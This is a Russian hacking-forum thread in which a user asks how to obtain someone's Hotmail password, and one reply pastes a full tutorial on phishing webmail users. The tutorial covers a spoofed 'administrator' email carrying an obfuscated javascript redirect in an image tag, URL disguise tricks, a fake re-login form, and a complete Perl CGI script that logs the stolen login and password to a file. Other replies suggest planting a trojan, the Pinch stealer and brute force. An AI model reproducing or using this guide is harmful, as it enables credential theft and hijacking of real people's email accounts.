Здравствуйте Гость ( Вход | Регистрация )

Скрыть объявления

Объявления

В разделе товаров и услуг все темы проходят премодерацию, согласно правилам раздела, поэтому, создав тему (ОНА БУДЕТ СКРЫТА И ВИДНА ТОЛЬКО ПРОВЕРЯЮЩИМ!), сами связывайтесь с одним из гарантов форума и проходите проверку, либо создавайте тему в соответствующем разделе.


»VIP Friends: ZloY TEaM | exploit.in | PLB-Team | coru | r0 Crew

Блоги | Jabber-конференция | Xiki

[????? ??????][??????? ????][??????? ?????]

[ Стандартный ] · Линейный

> Взлом мыла на Hotmail.

Gamers
post 05.06.06, 02:23:53
Отправлено #1


Очень Неумный
Group Icon
Сообщений: 77
Регистрация: 04.02.06
Пользователь №: 3068

Профиль

Рейтинг: < -8 ( -5 ) 8 >
Респекты:- < ( Нет ) > +


Народ кто знает как можно узнать пароль от ящика на сервере Hotmail?
[OFF][???????][?????]
[UP]  
comAT0Zz
post 05.06.06, 06:34:43
Отправлено #2


Завсегдатый
Group Icon
Сообщений: 224
Регистрация: 22.05.06
Пользователь №: 4257

Профиль

Рейтинг: < -8 ( 2 ) 8 >
Респекты:- < ( 17 ) > +


спросить у владельца=)
[OFF][???????][?????]
[UP]  [????]
Roach
post 05.06.06, 10:42:05
Отправлено #3


Насекомое
Group Icon
Сообщений: 485
Регистрация: 25.12.05
Из: root@localhost#
Пользователь №: 2556

Профиль

Рейтинг: < -8 ( 2 ) 8 >
Респекты:- < ( 8 ) > +


В www.google.ru набери *Взлом мыла на Hotmail*(без *) и гугл тебе выдаст все статьи!
[OFF][???????][?????]
[UP]  [????]
DeusTirael
post 05.06.06, 17:30:33
Отправлено #4


Уважаемый
Group Icon
Сообщений: 528
Регистрация: 04.01.06
Пользователь №: 2649

Профиль

Рейтинг: < -8 ( 3 ) 8 >
Респекты:- < ( 128 ) > +


Цитата|Quote
В www.google.ru набери *Взлом мыла на Hotmail*(без *) и гугл тебе выдаст все статьи!

ГЕНЕАЛЬНО !
Gamers Ты что сам не мог додуматься ? Или ты думал тебе дадут ссылку на прогу, в которой всего одна кнопка "Сломать мыло на хотмэйл !" )))
[OFF][???????][?????]
[UP]  [????]
Winux
post 05.06.06, 20:42:17
Отправлено #5


Злой одмин
Group Icon
Сообщений: 6440
Регистрация: 12.11.04
Из: DamageLab
Пользователь №: 1

Профиль

Рейтинг: < -8 ( 0 ) 8 >
Респекты:- < ( 74 ) > +


Цитата|Quote(DeusTirael @ 5.06.06 17:30)
Ты что сам не мог додуматься ? Или ты думал тебе дадут ссылку на прогу, в которой всего одна кнопка "Сломать мыло на хотмэйл !" )))
*


Человек в сказке живет. Думает что нажать 1 кнопку и получить пароль ( о хэше речи вообе не идет) вполне реально. Хорошо хоть не добавил само мыло и не написал:
"Я тут редко бываю - вышлите пароли на мыло."

Кроме того этот "друг" завел тему я разделе уязвимостей.
[OFF][???????][?????]
[UP]  [ICQ][????]
Sanny
post 06.06.06, 02:51:30
Отправлено #6


Новичок
Group Icon
Сообщений: 26
Регистрация: 05.04.06
Пользователь №: 3682

Профиль

Рейтинг: < -8 ( -2 ) 8 >
Респекты:- < ( Нет ) > +


Цитата|Quote(Gamers @ 5.06.06 02:23)
Народ кто знает как можно узнать пароль от ящика на сервере Hotmail?
*


Вот тебе статейка для ознакомления.Сама по себе уже старовата,но можно почерпунть и интересное.
Код|Code
Другие методы взлома почтовых ящиков
пример на основе www.hotmail.com

Как-то проходил мимо очередного крутого нюк/хак/крак сайта и наткнулся на статью по взлому хотмейла...Стало интересно, начал читать, вот отрывок из статьи:


"Example 4:
(Big Gay Al): Hi honey, how was your day?
(Big Gay Joe): TELL ME YOUR HOTMAIL PASSWORD NOW SLUT!
(Big Gay Al): What do you mean tell you my hotmail password?
(Big Gay Joe): I SAID TELL ME THE PASSWORD ASSFACE#%$@^&
(Big Gay Al): Ok, ok...it's backdoor_bandit. Ok?
(Big Gay Joe): IF YOU'RE NOT TELLING ME THE TRUTH...
I'M PICKING YOUR EYES OUT WITH AN ICE PICK!
(Big Gay Al): It's the truth, I swear.
(Big Gay Joe): Thank you."

Предисловие Когда-то давно у меня появилась идея - а не сделать ли какой-нибудь фальшивый коммерческий интернет сайт(например, спортивный магазин)...и получать все детали о пользователях. Естественно, сделал бы огромный промоушен для сайта(сам сайт можно было бы разместить с доменом первого уровня для солидности), и стал бы собирать детали пользователей под предлогом "раздачи маек и бейсболок". Детали включали бы в себя Имя, Адрес, Имейл и, конечно же, пароль, каторый был бы нужен впоследствии по двум причинам:
+Для того, чтобы пользователь, получив имейл с уведомлением о том, что его детали были добавлены в базу данных, и, указывая его персональный ПИН, присланный с сервера, мог подтвердить, что он получил имейл, и якобы компания "пришлет вам вашу бейсболку как можно скорее..."
+Для того, чтобы впоследствии пользователь мог залогиниться в магазин и выбирать товары

С моей стороны этой информации было бы достаточно, чтобы получить доступ к имейлам более чем половины пользователей. Сколько из вас задумывались о том, какой процент пользователей имеет только один пароль на все эккаунты(будь то имел или порно сайты)? Я сделал опрос и увидел что Большинство именно и используют такой способ.

Теперь физическая сторона реализации идеи:
Берем, делаем красивый сайт, тащим с других сайтов картинки, все это красиво офоромляем, и на первой страничке сообщаем, что "раздаем бейсболки и презервативы, зарегистрируйтесь здесь". Дальше по ссылке регистрации делаем форму и пишем cgi скрипт, с помощью которого все данные будут сохраняться, каждому юзеру случайным путем будет присваиватьси confirmation PIN number и выслатьси письмо с ним....итд

Таким образом можно было бы тырить имейлы, icq номера и много еще чего(зависит от того, сколько информации лежит в почтовом ящике, обычно ее много).

Рассказ
Месяца три назад я, как-то используя ящик ХотМейла, наткнулся на идею...
У меня в букмарках был хотмейловский сайт, я зашел на него, ввел логин и пароль и прочитал письма. После этого, я, по ошибке, еще раз кликнул на тот же самый букмарк, содержащий ссылку на ХотМейл, и увидел экран, сообщающий ошибку и просьбу повторно ввести пароль. Появилась идея... А что если сделать такую фальшивую страничку и спасать пароль вместе с имейлом в базу данных на своем собственном сервере. То есть появилась как бы модификация первой идеи, изложенной в предисловии, хотя она глупая и менее эффективная(та, что первая).



Метод
Все, вышеперечисленное в предыдущем абзаце, делается в четыре ступени:

Сначала пользователю посылается письмо с HTML кодом, в котором есть код редиректа

Редирект перенаправляет страничку на собственный сервер, где появляется фейк форма, просящая повторно ввести пароль

После введения пароля и нажатия кнопки Sign In, данные записываются в текст файл

Юзер переадресовывается опять, теперь уже на любой микрософтовский сервер

1) Для начала разберемся с самим письмом...Нужно написать редирект.
Существует два метода редиректа:
  +Редирект с помощью META HTTP-EQUIV
  +Редирект с помощью Ява скрипта

Редирект с помощью META HTTP-EQUIV выглядит так:
<META HTTP-EQUIV=Refresh CONTENT="0; URL=http://URL_Here">
Все это дело вставляется между <head> и </head>, где в значении CONTENT указывается время, после которого должен произойти редирект, и URL значение редиректа.

Редирект с помщью Ява скрипта выглядит так:
<script language="JavaScript">
window.location="http://URL_Here"
</script>

Ни один, ни другой в чистом виде не прокатывают через фильтры почтовых систем, а в особенности Хотмейла. Все мета теги просто убираются при отсылке письма, а ява скрипты просто блокируются.
В данном случае мы не будем рассматривать первый вид редиректа, так как я не видел способов, как можно обойти фильтры с помощью мета тэга.
Зато второй вариант можно всячески переделывать...Например, можно:

Кроме чистого вида встявлять в тег <a href="Some_JavaScript">Линк</a>

Встявлять в тег <img src="Some_JavaScript">
И даже встявлять в стили:
<style TYPE="text/css">
@import url(Some_JavaScript);
</style>
Все эти методы работают до сих пор на многих почтовых системах мира(например, WorldMailer.com) без дополнительных изменений. Год-полгода назад это работало и на Хотмейле. Но так как из Web based эта система самая продвинутая, администраторы очень быстро осознают ситуацию и патчат систему.

Народ тоже не сидит на месте...все время находятся новые способы выполнения ява скрипта в браузере, тем самым открывая доступ не только к имейлам пользователей, но и доступ к их компьютерам.

Допустим, что показанная ниже дыра да сих пор работает на ХотМейле (кстати, на других системах она работает да сих пор):
<!-- Начало скрипта -->
<IMG SRC="java

scri

pt:alert('Оппа! Я вас хакнул!');">
<!-- Конец скрипта -->

И что дальше?....а дальше нужно вместо Popup Window поставить скрипт редиректа.
Чтобы вот это:
<script language="JavaScript">
window.location="http://URL_Here"
</script>
Вставить в тег картинки, нужно сделать небольшую модификацию...
Будет это выглядеть вот так:
<img src="javascript:location='http://URL_Here';">

Но это есчо не все, что связано с формированием письма. Хочу добавить есчо пару дополнительных штрихов:
Оформление странички
Во-первых, при открытии письма, сама картинка не загрузится...а будет стандартный пустой квадрат(бывает когда Браузер не может найти саму картинку), а ведь это некрасиво и может быть подозрительным, поэтому, для улучшения вида, сведем размеры картинки к минимуму, width="1" height="1". Дальше, для более понятного вида, нужно отступить пару строчек от начала письма и в середине вставить запись "Loading....". Тогда юзеру не станет подозрительным тот самый зловещий редирект(он ведь за секунду делается, а не за миллисекунду, так что будет заметен). И есчо один штрих: отступите полстранички после слова Loading. Готовое письмо будет выглядеть так:
==============
<html>
<body>
<center>
<p>
<br>

<font face="ms sans serif, arial" size=-1>

Loading....
<br>

<img src="javascript:location='http://Redirect_URL_Here';" width="1" height="1">
<!-- Есессно, здесь нада заменить ява скрипт подходящим -->

</font>

<p>
<br><p><br><p><br><p><br><p><br><p><br><p><br><p><br><p><br>
<p><br><p><br><p><br><p><br><p><br><p><br><p><br><p><br><p>
<br>

</center>
</body>
</html>
==============

Прелесть ХотМейла заключается в двух вещах:
+Доступа через POP3 нет вообще, то есть письмо все равно придется читать через браузер
+Без включенной явы зайти на эккаунт невозможно(!)



Регистрация подходящего мыла\Отсылка письма
Для того, чтобы всё сработало корректно, в том числе ХТМЛ, и запустилась ява, нужно правильным образом отослать письмо...Причем не все методы отсылки работают. Например, пробуя отослать письмо через обычный SMTP клиент на ХотМейловский адрес не дает нужных результатов, даже когда в заголовке указываешь формат письма как ХТМЛ (что просто необходимо указать), хотя тоже самое прекрасно работает на других серверах (например www.worldmailer.com). Самое главное в этом - поэксперементировать, прежде чем отсылать письмо жертве. На хотмейл очень хорошо, например, отсылать с имейла от www.inbox.ru, он отсылает все в правильном формате. Теперь сделаю добавочку насчет советов по регистрации эккаунта, с которого можно отсылать письма, если вы решили не использовать SMTP клиент: Зарегистрируйте эккаунт с названием типа admin, administrator, admin_, administrator_, итд....чтобы было видно что шлет администратор. Если используется SMTP клиент, то легко подделать любой обратный имейл. Ваше имя будет зависеть от названия той или иной почтовой системы...например, в случае ХотМейла, ваше имя будет как Hotmail, фамилия как Administration. Тогда юзер будет получать письмо, и в списке новых писем он увидит письмо от администратора, которое он с испугом прочтет в первую очередь. Как правило, лучше всего в поле Subject поставить слово "Warning!", тогда точно юзер будет читать писмьмо (скорее всего, первее всех остальных).

Кодирование URL
Но не все так просто, как кажется! Когда происходит редирект, то страничка открывается с моего сервера, естественно, в строке адреса в браузере будет другой адрес, заметить который можно очень легко. После такого адреса никакой юзер не будет повторно вводить пароль. И что же делать? Конечно закодировать URL!
Существует несколько путей, с помощью которых можно это сделать...
+ В первую очередь, вместо домена нужно поставить его IP адрес, тогда будет сложнее понять, куда редирект (дальше директории и юзернейм можно подобрать, чтобы выглядело как на хотмейле). IP адрес в свою очередь тоже можно закодировать, причем разными способами! В конце статьи есть ссылка на полное описание того, как это сделать.
+ Сам путь тоже можно закодировать, используя ASCII таблицу(прилагается), то есть, например, вместо w можно поставить %77 итд...
Поправка: очень редко работает закодированный таким образом URL, так что опять же советую протестировать пару раз в обеих бразуерах(NN, IE).
+ Также можно вставить немного мусора, вот пример:
http://[email protected]/ что тоже самое что и http://www.hotmail.com/
То есть получается так, что все, что стоит между http:// и @, не принимается во внимание браузером.
Канечно, для этой функции есть свое назначение, но об этом в другой статье.
Специально, чтобы облегчить труд идиотам, наша группа накатала программку, каторая закодирует URL так, как вам нужно, ссылка на нее ниже.
В конце статьи есть ссылка на источник информации о вышеописанном методе.

Теперь о главном: Отправка данных и запись в файл
Подготовка формы
Ну сделали мы редирект на страничку, и что дальше??? дальше нужно подумать, какими способами с помощью своей странички можно стырить пароль. Очень просто, как уже писалось выше, достаточно лишь сделать поддельный экран с сообщением об ошибке и попросить ввести пароль. Как вы будете делать и оформлять эту странчку - меня не волнует, можно нарисовать занова, а можно содрать ХотМейлвскую, но если делаете второе, то не забудьте очистить код от мусора типа ненужных input тегов, и ява скриптов. Я лучше опишу как сделать отправку. Если вы не знаете что такое ХТМЛ формы и их синтаксис, то вам тут делать нечего. Значит так. Нужно сделать простую отправку с двумя данными: логин(или имейл, если вы "работаете" сразу с несколькими мыльными системами) и пароль. Естессно, логин вы уже заранее знаете, то есть юзер его вводить не должен, поэтому поле будет скрытым. Второе поле, как и в ХотМейловской страничке, обычное текстовое поле с типом пароль(чтоб звездочки были видны). Поле логина мы назовем как name, поле пароля - как pass; это нам пригодится в дальнейшем. Да! и забыл сказать, метод постинга лучше поставить как POST, чтобы не было видно логина и пароля в строке URL при отправке, а то будет подозрительно. Выглядеть это все будет вот так:

<form action="write.cgi" method="post">

<input type="hidden" name="name" value="[email protected]">
<input type="password" length="20" name="pass"><br>
<input type="submit" value="Sign In">

</form>

Дополнительно...FAQ
Q: Как же быть, если я хочу сразу заниматьси несколькими эккаунтами?
A: Самый простой способ - это для кадого логина делать свою страничку, разными в каждой страничке будут две вещи:
+Скрытое поле name
+Сам имейл(в случае ХотМейла), каторый будет красоватьси на страничке(см. скриншот выше)

Q: Где мне размещать такую страничку?*
A: Где угодно, но нужно учитывать три вещи:
+ Необходима поддержка перл скриптов(а как же мы записывать-то инфу без него будем?)
+ Скорость сервера(чем быстрей, тем, есессно, лучше)
+ Ну и конечно же, чтоб имя и путь был как можно короче, хотя в большинстве случаев его всегда можно закодировать(о чем я говорил выше)
* - Только не забудьте убрать PopUp Banner или Фрейм, а то ничего не выйдет, юзер все поймет.

Запись в файл
Записать все данные, отосланные формой, поможет нам тот самый write.cgi, который был указан в определении формы. Разберу структуру скрипта, перечисляя его:


# Часть no. 1
# Этот кусок вытаскивает все переменные из того, что было
# послано формой в массив, и расщепляет наши две переменные
# в $name и $pass, эту часть можно не изменять вообще

&GetFormInput;

$name=$field{'name'};
$pass=$field{'pass'};

sub GetFormInput {

       (*fval) = @_ if @_;
       local ($buf);
       if ($ENV{'REQUEST_METHOD'} eq 'POST') {
               read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
       }
       else {
               $buf=$ENV{'QUERY_STRING'};
       }
       if ($buf eq "") {
                       return 0;
               }
       else {
               @fval=split(/&/,$buf);
               foreach $i (0 .. $#fval){
                 ($name,$val)=split (/=/,$fval[$i],2);
                 $val=~tr/+/ /;
                 $val=~ s/%(..)/pack("c",hex($1))/ge;
                 $name=~tr/+/ /;
                 $name=~ s/%(..)/pack("c",hex($1))/ge;

                 if (!defined($field{$name})) {
                       $field{$name}=$val;
                 }
                 else {
                       $field{$name} .= ",$val";
                 }
                }
               }
 return 1;
}
# Конец Части no. 1


# Часть no. 2
# Теперь спасаем переменные в текст файл pass.txt
# Сначала откроем его, ИСПОЛЬЗУЕМ метод APPEND(>>)
# Если он не существует, то он будет автоматически создан
open (OUTFILE, ">>pass.txt");

# Запишем переменные в файл
print OUTFILE "$name";
print OUTFILE "\n$pass";

# И несколько "украшений" для удобства дальнейшего чтения
print OUTFILE "\n=======END=======\n\n";

# Может закроем теперь файл?
close (OUTFILE);
# Конец Части no. 2


# Часть no. 3
# Теперь, после записи данных в файл, можно послать юзера куда
# подальше, что мы и делаем
print "Location: http://your_redirect_URL\n";
# Конец Части no. 3


Советую в части номер 3 посылать юзера не только куда подальше, а например на ссылку logout'а, то есть сделать вид, что он ошибся с паролем, тогда, даже если у юзера возникнут какие-то подозрения и он просто для прикола введет неправильный пароль, он не сможет читать почту, и придется сделать логин занова. Залогинившись по-новой, юзер обычно читает письмо есчо раз, и на этот раз введет правильный пароль! Все вышесказанное случается очень часто(что я и увидел при тестировании этого метода).

< Вот так выглядит результат от приведенного выше скрипта.

Ну вот вроде и все, в чем, собственно, и заключался этот метод. Не хотел я писать это все, но постоянные вопросы типа "Как ты это делаешь?", указали мне только один выход.

Послесловие
К дполнению всему вышесказанному, я хотел бы сказать вам есчо две вещи:
1) Хоть и вышеуказанные эксплоиты уже не работают на ХотМейле, в статье я сообщил более чем достаточно информации для модификации существующих материалов и разработки новых эксплоитов.
2) Статья описывает один из самых простых методов получения паролей, пределы возможностей почти неисчерпаемы. С помощью вот этих основных знаний можно сделать с компьютером жертвы практически все, включая формат диска, всаживание трояна без предупреждения, записи/чтения кукей, итд...

А вот вам список некоторых Мейл серверов, поддерживающих ХТМЛ:
www.hotmail.com
www.mail.ee
www.hot.ee
www.inbox.ru
www.yahoo.com
www.worldmailer.com

[Zenon nsp]
www.zmail.ru
www.id.ru
www.go.ru
www.ok.ru
www.ru.ru
www.quake.ru

Список вовсе не полный, и включает в себя только те системы, на которых я "тестировал" идеи.

Поправки
+ Очень интересную поправку я получил от нашего нового мембера, zzz:
Можно использовать и хостинг без скриптинга - есть публичные скрипты для пересылки данных формы. Правда некоторые из них после пересылки выкидывают на странички с рекламой - это категорически не подходит. Но есть и такие, которым одним из параметров передается урл редиректа. причем можно сделать очень просто - передать урл редиректа на другую свою страничку, а на ней вставить скрипт - хистори(-n) - подобрав n можно добиться, что юзер попадет в свой-же ящик.
Мой коммент.: Да, на самом деле, эта идея очень хороша, когда нет возможности запускать скрипты, или вы просто не знаете как обращаться с этим делом(записью данных в файл), так что дерзайте, если у кого получится, то соизвольте прислать примерчик, или хотя бы адрес такого сервиса.

+ Еще одна поправка пришла от URI-URI:
Прочитал внимательно твою статью, понравилась! Веселая такая, жизнеутверждающая статья :) Особенно поймешь почему мне она понравилась если не поленишься заглянуть в архивчик который я приаттачу. Мне тож разок надо было получить данные от одного перца с mail.ru и я сваял (почти) страницу, тока там проще мне надо было всего имя и фамилию и дату регистрации ящика сам понимаешь для чего. Ну еще вопрос секретнный заодно.
Мой коммент.: Ну что же, мне прислали частичное воплощение именно той идеи с "майками и бейсболками", что я описывал в самом начале. На почту присылается письмо с анкетой и обещанием прислать "подарок". Такое очень хорошо подходит для Mail.ru. Этот метод основывается на жадности владельца ящика. ССылка на архивчик с присланными мне файлами есть в конце статьи. Странички не доделаны, и делались для старого дизайна Mail.ru, но думаю что смысл показывается очень хорошо.

Дополение (от 16.10.2000)
В свзяи с большим интересом к статье и некоторыми очень глупыми письмами, пришлось сделать дополнение:

Прежде всесго, чтобы было поменьше таких вопросов, советую тем кто не знает что такое перл, или что такое формы почитать что-нить для начинающих... Формы, их структуру и строение советую выучить полностью, это не сложно. Две ссылочки: Первая на статью "All about forms" про формы(думаю, этого будет достаточно надолго) и "Intro 2 Perl" как введение в Перл, хотя эту статью советую только если вы хотите понять как обращаться с писаниной выше. Если же просто интересно как работает Перл, как на нем программить, итд, то советую найти что-нить получше.
Еще один частозадаваемый вопрос - Места, где есть поддержка CGI:
www.virtualave.net //Самый удобный для отладки - вам предоставляется хороший сервис, статистика и CGI лог с хорошим интерфейсом, не забудьте убрать баннеры...
www.webservis.ru //Вроде народ неплохо отзывается
www.h1.ru //Мой любимый, так как имеет короткое имя, опять же, не забудьте убрать баннер
Это не полный список, но думаю этого достаточно.

Также было задано несколько вопросов насчет улучшения идеи изложенной в статье, ее обтачивании и зашкуривании. Прежде чем предлагать такие идеи или спрашивать, как воплотить их, посмотрите сюда. Если там этой идеи нет, то напишите мне. Если она стоящая, то я помогу вам разобраться и возможно выложу решение здесь. Если же вы найдете свою идею в списке тех идей, на которые я дал линк, то вопросы можете не задавать, так как ответа не получите, вам придется искать информацию самим. Это сделано из-за причины ламеризма - народ пишет мне письма с просьбами обьяснить, как сделать автоматическую отсылку пароля на имейл, ICQ, итд. А ведь инфу на эту тему не сложно найти в интернете, не ленитесь, а поищите.

Дополение (от 30.10.2000)

Покопался тут в нете, и нашел пару программок, для конвертации айпи используя Dword(та самая фича, которую мы не доделали в нашей программе, потому что есть уже готовые проги, которые делают это). И так, выкладываю две версии программы: одну для платформы под невинным названием вынь, вторую на перле, то есть для *никсов, но в принципе можно и использовать на вынь, если поставить интерпретатор.

Как оказалось после исследований, некоторые пункты части статьи о закодировании URL'а не работают так как сказано в Netscape 4.0. В особенности:
Весь мусор вставленный после http://, но перед @ может иметь ограниченную длину(вся строка до окнчания домена больше 72 символов, например http://[email protected]).

Дополение (от 09.09.2001)

Тут мне подсказал Gercog Vindzorsky, что знаменитый хостер by.ru предоставляет сервис сохранения данных с формы без написания скрипта, так что вам совсем не нужно знать Перл, чтобы испробовать этот метод. Инструкции по использованию такого замечательного сервиса лежат здесь. Недостаток небольшой все-таки есть - серверы by.ru имеют очень плохой канал за бугор. Так что...

Насчет эффективности данного метода на текущий срок: Печально, но все таки, администрация Hotmail.com коренным образом наконец-то пересмотрела свою безопасность, в часности, методы и алгоритмы защиты и фильтрации скриптов, что делает использование вышеописанного метода практически невозможным. Однако, самое интересное, что данный метод да сих пор работает на таких сервисах, как mail.ru.

Как не попасться на крючок?
В данном случае, если использовалось только то что давно в статье, нужно просто внимательно смотреть куда и что вы вводите, и жать на линк Sign Out, каждый раз когда у вас спрашивают повторно ввести пароль. Так же, можно после логина в ХотМейл, отключать яву, это работает, но неудобно.
Ну а теперь ответ на вопрос "Как защитить себя от этого и других методов взлома?"
НИКАК! бдительность не поможет, отключение явы тоже. Есть многие другие возможности взлома, не используя хоть капельку соц. инженерии, то есть у вас даже не спросят ввести пароль. Недавно, вот например, обнаружили очередную дырку в IE, которая как раз и является примером того, что я только что сказал. Многие говорят что нужно использовать Netscape, и могут смело считать себя лохами! Независимо от того что у вас, и включена ли ява, вас все равно можно хакнуть! Так что единственное решение: убрать компьютер, зыбать про e-mail, сходить к врачу. Хотя можно канечно поставить Firewall, чтоб ничего не проходило, но поверьте мне, можно использовать и стандартные порты...(80, 25, итд), ничего не поможет, если человек подойдет к делу очень аккуратно.
Не ругайте зря Internet Explorer! у Netscape не меньше дырок(особенно у новой версии).

Заключение
Кто бы ни говорил, что этот метод для ламаков, вы просто не правы! Метод работает, на все 90%, если все делать аккуратно и не спеша, так что такие комментарии мне не слать.

А вообще, было бы очень приятно услышать от тех, кому понравилась статья, у кого есть какие-то добавления, замечания, поправления, дополнения, предложения, итд.

Uzbeck aka NiFiGaSebe!
[email protected]
[OFF][???????][?????]
[UP]  
Mail2k
post 06.06.06, 12:01:25
Отправлено #7


Уважаемый
Group Icon
Сообщений: 379
Регистрация: 24.05.06
Пользователь №: 4291

Профиль

Рейтинг: < -8 ( 0 ) 8 >
Респекты:- < ( 13 ) > +


Цитата|Quote(Gamers @ 5.06.06 02:23)
Народ кто знает как можно узнать пароль от ящика на сервере Hotmail?
*




А хотя бы здесь ты не пробовал искать?
http://www.yandex.ru/yandsearch?stype=www&...B%EE%EC+hotmail

Сообщение отредактировал Mail2k - 06.06.06, 12:02:38
[OFF][???????][?????]
[UP]  [ICQ][????]
Maxis
post 06.06.06, 21:29:58
Отправлено #8


Новичок
Group Icon
Сообщений: 37
Регистрация: 17.05.06
Пользователь №: 4192

Профиль

Рейтинг: < -8 ( ) 8 >
Респекты:- < ( Нет ) > +


Gamers
Попробуй подсунуть владельцу трой ;)
[OFF][???????][?????]
[UP]  
madde
post 08.06.06, 12:57:58
Отправлено #9


Уважаемый
Group Icon
Сообщений: 375
Регистрация: 12.05.06
Пользователь №: 4148

Профиль

Рейтинг: < -8 ( 1 ) 8 >
Респекты:- < ( 11 ) > +


есть прога ifreez -50 градусов--- она тебе поможет:)

Сообщение отредактировал madde - 08.06.06, 12:59:36
[OFF][???????][?????]
[UP]  [ICQ][????]
<Groзa>
post 13.06.06, 16:25:50
Отправлено #10


Новичок
Group Icon
Сообщений: 4
Регистрация: 15.05.06
Пользователь №: 4172

Профиль

Рейтинг: < -8 ( 1 ) 8 >
Респекты:- < ( Нет ) > +


пинч/хинч, брут, СИ наконец
Поиск=) как много в этом звуке)
[OFF][???????][?????]
[UP]  

[????? ??????][????? ????][??????? ????]
1 чел. читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
 


Упрощенная версия

SSL